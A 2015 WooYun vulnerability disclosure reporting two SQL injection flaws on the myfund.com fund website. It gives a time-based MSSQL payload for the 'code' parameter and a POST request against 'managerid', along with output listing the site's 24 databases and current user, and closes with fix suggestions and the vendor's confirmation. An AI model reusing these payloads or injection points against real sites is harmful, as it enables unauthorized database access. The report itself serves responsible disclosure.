漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0109469
漏洞标题:展恒基金主站mssqlserver注入两枚
相关厂商:展恒基金
漏洞作者: 大懒
提交时间:2015-04-21 18:08
修复时间:2015-06-10 01:02
公开时间:2015-06-10 01:02
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:10
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-04-21: 细节已通知厂商并且等待厂商处理中
2015-04-26: 厂商已经确认,细节仅向厂商公开
2015-05-06: 细节向核心白帽子及相关领域专家公开
2015-05-16: 细节向普通白帽子公开
2015-05-26: 细节向实习白帽子公开
2015-06-10: 细节向公众公开
简要描述:
详细说明:
1.
URL:http://www.myfund.com/simu/fitem.aspx?code=*
存在问题参数code
payload ' WAITFOR DELAY '0:0:5'--
2.
post注入
URL:http://www.myfund.com/fundselect/jijinjingli.aspx?managerid=*
post参数:
__VIEWSTATE=/wEPDwUKMTM3NTUzMzY4MA9kFgJmD2QWHmYPDxYCHgRUZXh0BQblvKDpkqtkZAIBDw8WAh8ABQUwLjAwJWRkAgIPDxYCHwAFBTAuMDAlZGQCAw8PFgIfAAUFMC4wMSVkZAIEDw8WAh8ABQUwLjAzJWRkAgUPDxYCHwAFBTAuMDUlZGQCBg8PFgIfAAUFMC4wMCVkZAIHDw8WAh8ABQnmsqrmt7EzMDBkZAIIDw8WAh8ABQU0NTIxJWRkAgkPDxYCHwAFBTIuMjglZGQCCg8PFgIfAAUFMTYuMSVkZAILDw8WAh8ABQUzMy4xJWRkAgwPDxYCHwAFBTg0LjIlZGQCDQ8PFgIfAAUFMTAzLiVkZAIODxYCHwAFtkE8dHI%2bPHRkIGNsYXNzPSdoLWZnMjEnIHJvd3NwYW49JzEwJz4g5a%2bM5Zu95Z%2b66YeR566h55CG5pyJ6ZmQ5YWs5Y%2b4PC90ZD4NCiAgICAgICAgICAgICAgICAgICAgICAgIDx0ZCBjbGFzcz0naC1mZzIyJz4gPGEgaWQ9JzEwMDAzNScgPiAxMDAwMzU8L2E%2bDQogICAgICAgICAgICAgICAgICAgICAgICA8L3RkPg0KICAgICAgICAgICAgICAgICAgICAgICAgPHRkIGNsYXNzPSdoLWZnMjMnPiA8YSBpZD0nMTAwMDM1JyBocmVmPSdodHRwOi8vd3d3Lm15ZnVuZC5jb20vaHRtbC8xMDAwMzUuc2h0bWwnPiDlr4zlm73kvJjljJblop7lvLrlgLrliLhBL0I8L2E%2bDQogICAgICAgICAgICAgICAgICAgICAgICA8L3RkPg0KICAgICAgICAgICAgICAgICAgICAgICAgPHRkIGNsYXNzPSdoLWZnMjQnPiDlgLrliLjlnosNCiAgICAgICAgICAgICAgICAgICAgICAgIDwvdGQ%2bDQogICAgICAgICAgICAgICAgICAgICAgICAgPHRkIGNsYXNzPSdoLWZnMjUnPiAyMDE0LzcvMjkNCiAgICAgICAgICAgICAgICAgICAgICAgIDwvdGQ%2bDQogICAgICAgICAgICAgICAgICAgICAgICA8dGQgY2xhc3M9J2gtZmcyNic%2bIC0tDQogICAgICAgICAgICAgICAgICAgICAgICA8L3RkPg0KICAgICAgICAgICAgICAgICAgICAgICAgPHRkIGNsYXNzPSdoLWZnMjcgY19jb2xvcjInPiAyMi4wMCUNCiAgICAgICAgICAgICAgICAgICAgICAgIDwvdGQ%2bDQogICAgICAgICAgICAgICAgICAgICAgICA8dGQgY2xhc3M9J2gtZmcyOCBjX2NvbG9yMic%2bIDMxLjAwJQ0KICAgICAgICAgICAgICAgICAgICAgICAgPC90ZD4NCiAgICAgICAgICAgICAgICAgICAgICAgICA8L3RyPiA8L3RyPiA8dHIgPg0KICAgICAgICAgICAgICAgICAgICAgICAgPHRkIGNsYXNzPSdoLWZnMjInPiA8YSBpZD0nMTAwMDM3JyA%2bIDEwMDAzNzwvYT4NCiAgICAgICAgICAgICAgICAgICAgICAgIDwvdGQ%2bDQogICAgICAgICAgICAgICAgICAgICAgICA8dGQgY2xhc3M9J2gtZmcyMyc%2bIDxhIGlkPScxMDAwMzcnIGhyZWY9J2h0dHA6Ly93d3cubXlmdW5kLmNvbS9odG1sLzEwMDAzNy5zaHRtbCc%2bIOWvjOWbveS8mOWMluWinuW8uuWAuuWIuEM8L2E%2bDQogICAgICAgICAgICAgICAgICAgICAgICA8L3RkPg0KICAgICAgICAgICAgICAgICAgICAgICAgPHRkIGNsYXNzPSdoLWZnMjQnPiDlgLrliLjlnosNCiAgICAgICAgICAgICAgICAgICAgICAgIDwvdGQ%2bDQogICAgICAgICAgICAgICAgICAgICAgICAgPHRkIGNsYXNzPSdoLWZnMjUnPiAyMDE0LzcvMjkNCiAgICAgICAgICAgICAgICAgICAgICAgIDwvdGQ%2bDQogICAgICAgICAgICAgICAgICAgICAgICA8dGQgY2xhc3M9J2gtZmcyNic%2bIC0tDQogICAgICAgICAgICAgICAgICAgICAgICA8L3RkPg0KICAgICAgICAgICAgICAgICAgICAgICAgPHRkIGNsYXNzPSdoLWZnMjcgY19jb2xvcjInPiAyMi4wMCUNCiAgICAgICAgICAgICAgICAgICAgICAgIDwvdGQ%2bDQogICAgICAgICAgICAgICAgICAgICAgICA8dGQgY2xhc3M9J2gtZmcyOCBjX2NvbG9yMic%2bIDMwLjAwJQ0KICAgICAgICAgICAgICAgICAgICAgICAgPC90ZD4NCiAgICAgICAgICAgICAgICAgICAgICAgICA8L3RyPiA8dHIgPg0KICAgICAgICAgICAgICAgICAgICAgICAgPHRkIGNsYXNzPSdoLWZnMjInPiA8YSBpZD0nMTAwMDU4JyA%2bIDEwMDA1ODwvYT4NCiAgICAgICAgICAgICAgICAgICAgICAgIDwvdGQ%2bDQogICAgICAgICAgICAgICAgICAgICAgICA8dGQgY2xhc3M9J2gtZmcyMyc%2bIDxhIGlkPScxMDAwNTgnIGhyZWY9J2h0dHA6Ly93d3cubXlmdW5kLmNvbS9odG1sLzEwMDA1OC5zaHRtbCc%2bIOWvjOWbveS6p%2bS4muWAujwvYT4NCiAgICAgICAgICAgICAgICAgICAgICAgIDwvdGQ%2bDQogICAgICAgICAgICAgICAgICAgICAgICA8dGQgY2xhc3M9J2gtZmcyNCc%2bIOWAuuWIuOWeiw0KICAgICAgICAgICAgICAgICAgICAgICAgPC90ZD4NCiAgICAgICAgICAgICAgICAgICAgICAgICA8dGQgY2xhc3M9J2gtZmcyNSc%2bIDIwMTQvNy8yOQ0KICAgICAgICAgICAgICAgICAgICAgICAgPC90ZD4NCiAgICAgICAgICAgICAgICAgICAgICAgIDx0ZCBjbGFzcz0naC1mZzI2Jz4gLS0NCiAgICAgICAgICAgICAgICAgICAgICAgIDwvdGQ%2bDQogICAgICAgICAgICAgICAgICAgICAgICA8dGQgY2xhc3M9J2gtZmcyNyBjX2NvbG9yMic%2bIDUuMDAlDQogICAgICAgICAgICAgICAgICAgICAgICA8L3RkPg0KICAgICAgICAgICAgICAgICAgICAgICAgPHRkIGNsYXNzPSdoLWZnMjggY19jb2xvcjInPiA3LjAwJQ0KICAgICAgICAgICAgICAgICAgICAgICAgPC90ZD4NCiAgICAgICAgICAgICAgICAgICAgICAgICA8L3RyPiA8dHIgPg0KICAgICAgICAgICAgICAgICAgICAgICAgPHRkIGNsYXNzPSdoLWZnMjInPiA8YSBpZD0nMTYxMDE1JyA%2bIDE2MTAxNTwvYT4NCiAgICAgICAgICAgICAgICAgICAgICAgIDwvdGQ%2bDQogICAgICAgICAgICAgICAgICAgICAgICA8dGQgY2xhc3M9J2gtZmcyMyc%2bIDxhIGlkPScxNjEwMTUnIGhyZWY9J2h0dHA6Ly93d3cubXlmdW5kLmNvbS9odG1sLzE2MTAxNS5zaHRtbCc%2bIOWvjOWbveWkqeebiOWAuuWIuChMT0YpPC9hPg0KICAgICAgICAgICAgICAgICAgICAgICAgPC90ZD4NCiAgICAgICAgICAgICAgICAgICAgICAgIDx0ZCBjbGFzcz0naC1mZzI0Jz4g5YC65Yi45Z6LDQogICAgICAgICAgICAgICAgICAgICAgICA8L3RkPg0KICAgICAgICAgICAgICAgICAgICAgICAgIDx0ZCBjbGFzcz0naC1mZzI1Jz4gMjAxNC83LzI5DQogICAgICAgICAgICAgICAgICAgICAgICA8L3RkPg0KICAgICAgICAgICAgICAgICAgICAgICAgPHRkIGNsYXNzPSdoLWZnMjYnPiAtLQ0KICAgICAgICAgICAgICAgICAgICAgICAgPC90ZD4NCiAgICAgICAgICAgICAgICAgICAgICAgIDx0ZCBjbGFzcz0naC1mZzI3IGNfY29sb3IyJz4gNC4wMCUNCiAgICAgICAgICAgICAgICAgICAgICAgIDwvdGQ%2bDQogICAgICAgICAgICAgICAgICAgICAgICA8dGQgY2xhc3M9J2gtZmcyOCBjX2NvbG9yMic%2bIDUuMDAlDQogICAgICAgICAgICAgICAgICAgICAgICA8L3RkPg0KICAgICAgICAgICAgICAgICAgICAgICAgIDwvdHI%2bIDx0ciA%2bDQogICAgICAgICAgICAgICAgICAgICAgICA8dGQgY2xhc3M9J2gtZmcyMic%2bIDxhIGlkPScwMDA4NDEnID4gMDAwODQxPC9hPg0KICAgICAgICAgICAgICAgICAgICAgICAgPC90ZD4NCiAgICAgICAgICAgICAgICAgICAgICAgIDx0ZCBjbGFzcz0naC1mZzIzJz4gPGEgaWQ9JzAwMDg0MScgaHJlZj0naHR0cDovL3d3dy5teWZ1bmQuY29tL2h0bWwvMDAwODQxLnNodG1sJz4g5a%2bM5Zu95paw5Zue5oql54G15rS76YWN572u5re35ZCIQTwvYT4NCiAgICAgICAgICAgICAgICAgICAgICAgIDwvdGQ%2bDQogICAgICAgICAgICAgICAgICAgICAgICA8dGQgY2xhc3M9J2gtZmcyNCc%2bIOa3t%2bWQiOWeiw0KICAgICAgICAgICAgICAgICAgICAgICAgPC90ZD4NCiAgICAgICAgICAgICAgICAgICAgICAgICA8dGQgY2xhc3M9J2gtZmcyNSc%2bIDIwMTQvMTAvMg0KICAgICAgICAgICAgICAgICAgICAgICAgPC90ZD4NCiAgICAgICAgICAgICAgICAgICAgICAgIDx0ZCBjbGFzcz0naC1mZzI2Jz4gLS0NCiAgICAgICAgICAgICAgICAgICAgICAgIDwvdGQ%2bDQogICAgICAgICAgICAgICAgICAgICAgICA8dGQgY2xhc3M9J2gtZmcyNyBjX2NvbG9yMic%2bIDUuMDAlDQogICAgICAgICAgICAgICAgICAgICAgICA8L3RkPg0KICAgICAgICAgICAgICAgICAgICAgICAgPHRkIGNsYXNzPSdoLWZnMjggY19jb2xvcjInPiAxMC4wMCUNCiAgICAgICAgICAgICAgICAgICAgICAgIDwvdGQ%2bDQogICAgICAgICAgICAgICAgICAgICAgICAgPC90cj4gPHRyID4NCiAgICAgICAgICAgICAgICAgICAgICAgIDx0ZCBjbGFzcz0naC1mZzIyJz4gPGEgaWQ9JzAwMDg0MycgPiAwMDA4NDM8L2E%2bDQogICAgICAgICAgICAgICAgICAgICAgICA8L3RkPg0KICAgICAgICAgICAgICAgICAgICAgICAgPHRkIGNsYXNzPSdoLWZnMjMnPiA8YSBpZD0nMDAwODQzJyBocmVmPSdodHRwOi8vd3d3Lm15ZnVuZC5jb20vaHRtbC8wMDA4NDMuc2h0bWwnPiDlr4zlm73mlrDlm57miqXngbXmtLvphY3nva7mt7flkIhDPC9hPg0KICAgICAgICAgICAgICAgICAgICAgICAgPC90ZD4NCiAgICAgICAgICAgICAgICAgICAgICAgIDx0ZCBjbGFzcz0naC1mZzI0Jz4g5re35ZCI5Z6LDQogICAgICAgICAgICAgICAgICAgICAgICA8L3RkPg0KICAgICAgICAgICAgICAgICAgICAgICAgIDx0ZCBjbGFzcz0naC1mZzI1Jz4gMjAxNC8xMC8yDQogICAgICAgICAgICAgICAgICAgICAgICA8L3RkPg0KICAgICAgICAgICAgICAgICAgICAgICAgPHRkIGNsYXNzPSdoLWZnMjYnPiAtLQ0KICAgICAgICAgICAgICAgICAgICAgICAgPC90ZD4NCiAgICAgICAgICAgICAgICAgICAgICAgIDx0ZCBjbGFzcz0naC1mZzI3IGNfY29sb3IyJz4gNS4wMCUNCiAgICAgICAgICAgICAgICAgICAgICAgIDwvdGQ%2bDQogICAgICAgICAgICAgICAgICAgICAgICA8dGQgY2xhc3M9J2gtZmcyOCBjX2NvbG9yMic%2bIDEwLjAwJQ0KICAgICAgICAgICAgICAgICAgICAgICAgPC90ZD4NCiAgICAgICAgICAgICAgICAgICAgICAgICA8L3RyPiA8dHIgPg0KICAgICAgICAgICAgICAgICAgICAgICAgPHRkIGNsYXNzPSdoLWZnMjInPiA8YSBpZD0nMDAwMTM5JyA%2bIDAwMDEzOTwvYT4NCiAgICAgICAgICAgICAgICAgICAgICAgIDwvdGQ%2bDQogICAgICAgICAgICAgICAgICAgICAgICA8dGQgY2xhc3M9J2gtZmcyMyc%2bIDxhIGlkPScwMDAxMzknIGhyZWY9J2h0dHA6Ly93d3cubXlmdW5kLmNvbS9odG1sLzAwMDEzOS5zaHRtbCc%2bIOWvjOWbveWbveacieS8geS4muWAuuWAuuWIuEE8L2E%2bDQogICAgICAgICAgICAgICAgICAgICAgICA8L3RkPg0KICAgICAgICAgICAgICAgICAgICAgICAgPHRkIGNsYXNzPSdoLWZnMjQnPiDlgLrliLjlnosNCiAgICAgICAgICAgICAgICAgICAgICAgIDwvdGQ%2bDQogICAgICAgICAgICAgICAgICAgICAgICAgPHRkIGNsYXNzPSdoLWZnMjUnPiAyMDE0LzEwLzINCiAgICAgICAgICAgICAgICAgICAgICAgIDwvdGQ%2bDQogICAgICAgICAgICAgICAgICAgICAgICA8dGQgY2xhc3M9J2gtZmcyNic%2bIC0tDQogICAgICAgICAgICAgICAgICAgICAgICA8L3RkPg0KICAgICAgICAgICAgICAgICAgICAgICAgPHRkIGNsYXNzPSdoLWZnMjcgY19jb2xvcjQnPiAtMy4wMCUNCiAgICAgICAgICAgICAgICAgICAgICAgIDwvdGQ%2bDQogICAgICAgICAgICAgICAgICAgICAgICA8dGQgY2xhc3M9J2gtZmcyOCBjX2NvbG9yNCc%2bIC02LjAwJQ0KICAgICAgICAgICAgICAgICAgICAgICAgPC90ZD4NCiAgICAgICAgICAgICAgICAgICAgICAgICA8L3RyPiA8dHIgPg0KICAgICAgICAgICAgICAgICAgICAgICAgPHRkIGNsYXNzPSdoLWZnMjInPiA8YSBpZD0nMDAwMTQxJyA%2bIDAwMDE0MTwvYT4NCiAgICAgICAgICAgICAgICAgICAgICAgIDwvdGQ%2bDQogICAgICAgICAgICAgICAgICAgICAgICA8dGQgY2xhc3M9J2gtZmcyMyc%2bIDxhIGlkPScwMDAxNDEnIGhyZWY9J2h0dHA6Ly93d3cubXlmdW5kLmNvbS9odG1sLzAwMDE0MS5zaHRtbCc%2bIOWvjOWbveWbveacieS8geS4muWAuuWAuuWIuEM8L2E%2bDQogICAgICAgICAgICAgICAgICAgICAgICA8L3RkPg0KICAgICAgICAgICAgICAgICAgICAgICAgPHRkIGNsYXNzPSdoLWZnMjQnPiDlgLrliLjlnosNCiAgICAgICAgICAgICAgICAgICAgICAgIDwvdGQ%2bDQogICAgICAgICAgICAgICAgICAgICAgICAgPHRkIGNsYXNzPSdoLWZnMjUnPiAyMDE0LzEwLzINCiAgICAgICAgICAgICAgICAgICAgICAgIDwvdGQ%2bDQogICAgICAgICAgICAgICAgICAgICAgICA8dGQgY2xhc3M9J2gtZmcyNic%2bIC0tDQogICAgICAgICAgICAgICAgICAgICAgICA8L3RkPg0KICAgICAgICAgICAgICAgICAgICAgICAgPHRkIGNsYXNzPSdoLWZnMjcgY19jb2xvcjQnPiAtMy4wMCUNCiAgICAgICAgICAgICAgICAgICAgICAgIDwvdGQ%2bDQogICAgICAgICAgICAgICAgICAgICAgICA8dGQgY2xhc3M9J2gtZmcyOCBjX2NvbG9yNCc%2bIC02LjAwJQ0KICAgICAgICAgICAgICAgICAgICAgICAgPC90ZD4NCiAgICAgICAgICAgICAgICAgICAgICAgICA8L3RyPiA8dHIgPg0KICAgICAgICAgICAgICAgICAgICAgICAgPHRkIGNsYXNzPSdoLWZnMjInPiA8YSBpZD0nMDAwMTA3JyA%2bIDAwMDEwNzwvYT4NCiAgICAgICAgICAgICAgICAgICAgICAgIDwvdGQ%2bDQogICAgICAgICAgICAgICAgICAgICAgICA8dGQgY2xhc3M9J2gtZmcyMyc%2bIDxhIGlkPScwMDAxMDcnIGhyZWY9J2h0dHA6Ly93d3cubXlmdW5kLmNvbS9odG1sLzAwMDEwNy5zaHRtbCc%2bIOWvjOWbveS/oeeUqOWinuW8uuWAuuWIuEE8L2E%2bDQogICAgICAgICAgICAgICAgICAgICAgICA8L3RkPg0KICAgICAgICAgICAgICAgICAgICAgICAgPHRkIGNsYXNzPSdoLWZnMjQnPiDlgLrliLjlnosNCiAgICAgICAgICAgICAgICAgICAgICAgIDwvdGQ%2bDQogICAgICAgICAgICAgICAgICAgICAgICAgPHRkIGNsYXNzPSdoLWZnMjUnPiAyMDE0LzEwLzINCiAgICAgICAgICAgICAgICAgICAgICAgIDwvdGQ%2bDQogICAgICAgICAgICAgICAgICAgICAgICA8dGQgY2xhc3M9J2gtZmcyNic%2bIC0tDQogICAgICAgICAgICAgICAgICAgICAgICA8L3RkPg0KICAgICAgICAgICAgICAgICAgICAgICAgPHRkIGNsYXNzPSdoLWZnMjcgY19jb2xvcjInPiAxLjAwJQ0KICAgICAgICAgICAgICAgICAgICAgICAgPC90ZD4NCiAgICAgICAgICAgICAgICAgICAgICAgIDx0ZCBjbGFzcz0naC1mZzI4IGNfY29sb3IyJz4gMi4wMCUNCiAgICAgICAgICAgICAgICAgICAgICAgIDwvdGQ%2bDQogICAgICAgICAgICAgICAgICAgICAgICAgPC90cj4gPHRyID4NCiAgICAgICAgICAgICAgICAgICAgICAgIDx0ZCBjbGFzcz0naC1mZzIyJz4gPGEgaWQ9JzAwMDEwOScgPiAwMDAxMDk8L2E%2bDQogICAgICAgICAgICAgICAgICAgICAgICA8L3RkPg0KICAgICAgICAgICAgICAgICAgICAgICAgPHRkIGNsYXNzPSdoLWZnMjMnPiA8YSBpZD0nMDAwMTA5JyBocmVmPSdodHRwOi8vd3d3Lm15ZnVuZC5jb20vaHRtbC8wMDAxMDkuc2h0bWwnPiDlr4zlm73kv6HnlKjlop7lvLrlgLrliLhDPC9hPg0KICAgICAgICAgICAgICAgICAgICAgICAgPC90ZD4NCiAgICAgICAgICAgICAgICAgICAgICAgIDx0ZCBjbGFzcz0naC1mZzI0Jz4g5YC65Yi45Z6LDQogICAgICAgICAgICAgICAgICAgICAgICA8L3RkPg0KICAgICAgICAgICAgICAgICAgICAgICAgIDx0ZCBjbGFzcz0naC1mZzI1Jz4gMjAxNC8xMC8yDQogICAgICAgICAgICAgICAgICAgICAgICA8L3RkPg0KICAgICAgICAgICAgICAgICAgICAgICAgPHRkIGNsYXNzPSdoLWZnMjYnPiAtLQ0KICAgICAgICAgICAgICAgICAgICAgICAgPC90ZD4NCiAgICAgICAgICAgICAgICAgICAgICAgIDx0ZCBjbGFzcz0naC1mZzI3IGNfY29sb3IyJz4gMS4wMCUNCiAgICAgICAgICAgICAgICAgICAgICAgIDwvdGQ%2bDQogICAgICAgICAgICAgICAgICAgICAgICA8dGQgY2xhc3M9J2gtZmcyOCBjX2NvbG9yMic%2bIDEuMDAlDQogICAgICAgICAgICAgICAgICAgICAgICA8L3RkPg0KICAgICAgICAgICAgICAgICAgICAgICAgIDwvdHI%2bPHRyPjx0ZCBjbGFzcz0naC1mZzIxJyByb3dzcGFuPScxJz4g5Y2O5a%2bM5Z%2b66YeR566h55CG5pyJ6ZmQ5YWs5Y%2b4PC90ZD4NCiAgICAgICAgICAgICAgICAgICAgICAgIDx0ZCBjbGFzcz0naC1mZzIyJz4gPGEgaWQ9JzE2NDEwNScgPiAxNjQxMDU8L2E%2bDQogICAgICAgICAgICAgICAgICAgICAgICA8L3RkPg0KICAgICAgICAgICAgICAgICAgICAgICAgPHRkIGNsYXNzPSdoLWZnMjMnPiA8YSBpZD0nMTY0MTA1JyBocmVmPSdodHRwOi8vd3d3Lm15ZnVuZC5jb20vaHRtbC8xNjQxMDUuc2h0bWwnPiDljY7lr4zlvLrljJblm57miqXlgLrliLgoTE9GKTwvYT4NCiAgICAgICAgICAgICAgICAgICAgICAgIDwvdGQ%2bDQogICAgICAgICAgICAgICAgICAgICAgICA8dGQgY2xhc3M9J2gtZmcyNCc%2bIOWAuuWIuOWeiw0KICAgICAgICAgICAgICAgICAgICAgICAgPC90ZD4NCiAgICAgICAgICAgICAgICAgICAgICAgICA8dGQgY2xhc3M9J2gtZmcyNSc%2bIDIwMTEvNC8yNg0KICAgICAgICAgICAgICAgICAgICAgICAgPC90ZD4NCiAgICAgICAgICAgICAgICAgICAgICAgIDx0ZCBjbGFzcz0naC1mZzI2Jz4gMjAxNC8zLzE3DQogICAgICAgICAgICAgICAgICAgICAgICA8L3RkPg0KICAgICAgICAgICAgICAgICAgICAgICAgPHRkIGNsYXNzPSdoLWZnMjcgY19jb2xvcjInPiAzMy4wMCUNCiAgICAgICAgICAgICAgICAgICAgICAgIDwvdGQ%2bDQogICAgICAgICAgICAgICAgICAgICAgICA8dGQgY2xhc3M9J2gtZmcyOCBjX2NvbG9yMic%2bIDguMDAlDQogICAgICAgICAgICAgICAgICAgICAgICA8L3RkPg0KICAgICAgICAgICAgICAgICAgICAgICAgIDwvdHI%2bIDwvdHI%2bZGRfawD9DB6njHnlyX4YK3EbiYhkVY4mlA1CFUpNsRhEUA%3d%3d
存在问题的参数managerid
证明如下
current user: 'myfunduser'
available databases [24]
[*] bbbb
[*] db_datadown
[*] FinChinaData
[*] FundEvaluating
[*] hdesdb
[*] master
[*] MetaCRM
[*] MetaCRM5
[*] model
[*] msdb
[*] myfp
[*] myfpbbs
[*] MyfpData
[*] pgenius
[*] prim_temp
[*] PrimaryData
[*] PRIV_DB
[*] SBO-COMMON
[*] SBODemo_China
[*] SBODemo_SG
[*] SecondaryData
[*] Sifung_Cms_DB
[*] Sifung_Cms_DB1
[*] tempdb
漏洞证明:
与code这个参数有关系的URL还有
1.http://www.myfund.com/ajaxhdl/funditem.ashx
2.http://www.myfund.com/fundselect/gonggaoxiangqing.aspx
3.http://www.myfund.com/fundselect/pingji.aspx
4.http://www.myfund.com/simu/fcompany.aspx
建议检查
修复方案:
1过滤
2waf的规则还要增加
3.结构化查询语句
版权声明:转载请注明来源 大懒@乌云
漏洞回应
厂商回应:
危害等级:低
漏洞Rank:5
确认时间:2015-04-26 01:01
厂商回复:
已将建议提交至项目组,感谢大懒童鞋的关注以及做出的贡献
最新状态:
暂无